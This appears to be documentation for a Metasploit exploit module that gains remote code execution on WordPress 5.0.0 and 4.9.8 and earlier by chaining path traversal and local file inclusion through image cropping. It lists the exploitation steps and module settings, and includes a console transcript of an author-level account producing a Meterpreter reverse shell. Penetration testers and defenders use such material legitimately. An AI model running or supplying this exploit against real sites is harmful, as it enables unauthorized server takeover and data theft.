On WordPress versions 5.0.0 and <= 4.9.8 it is possible to gain arbitrary code execution via a core vulnerability combining a Path Traversal and a Local File Inclusion.
An attacker who gains access to an account with at least author privileges on the target can execute PHP code on the remote server.

## Exploitation Steps

1. Upload an image containing PHP code
2. Edit the `_wp_attached_file` entry from `meta_input` $_POST array to specify an arbitrary path
3. Perform the Path Traversal by using the `crop-image` Wordpress function
4. Perform the Local File Inclusion by creating a new WordPress post and set `_wp_page_template` value to the cropped image. The post will `include()` our image containing PHP code.

When visiting the post created by the attacker it is possible to obtain code execudion.

More details can be found on [RIPS Technology Blog](https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/).

## Verification Steps

Confirm that functionality works:
1. Start `msfconsole`
2. `use exploit/multi/http/wp_crop_rce`
3. Set the `RHOST`
4. Set `USERNAME` and `PASSWORD`
4. Set `LHOST` and `LPORT`
5. Run the exploit: `run`
6. Confirm you have now a meterpreter session

## Options

### THEME_DIR

The name of the theme Wordpress is using. Used if
the theme cannot be auto-detected.

## Scenarios

### Ubuntu 18.04 running WordPress 4.9.8

```
msf5 > use exploit/multi/http/wp_crop_rce
msf5 exploit(multi/http/wp_crop_rce) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf5 exploit(multi/http/wp_crop_rce) > set username author
username => author
msf5 exploit(multi/http/wp_crop_rce) > set password author
password => author
msf5 exploit(multi/http/wp_crop_rce) > run

[*] Started reverse TCP handler on 127.0.0.1:4444 
[*] Authenticating with WordPress using author:author...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Checking crop library
[*] Uploading payload
[+] Image uploaded
[*] Uploading payload
[+] Image uploaded
[*] Including into theme
[*] Sending stage (38247 bytes) to 127.0.0.1
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:36568) at 2019-03-19 11:33:27 -0400

meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 4.15.0-46-generic #49-Ubuntu SMP Wed Feb 6 09:33:07 UTC 2019 x86_64
Meterpreter : php/linux
```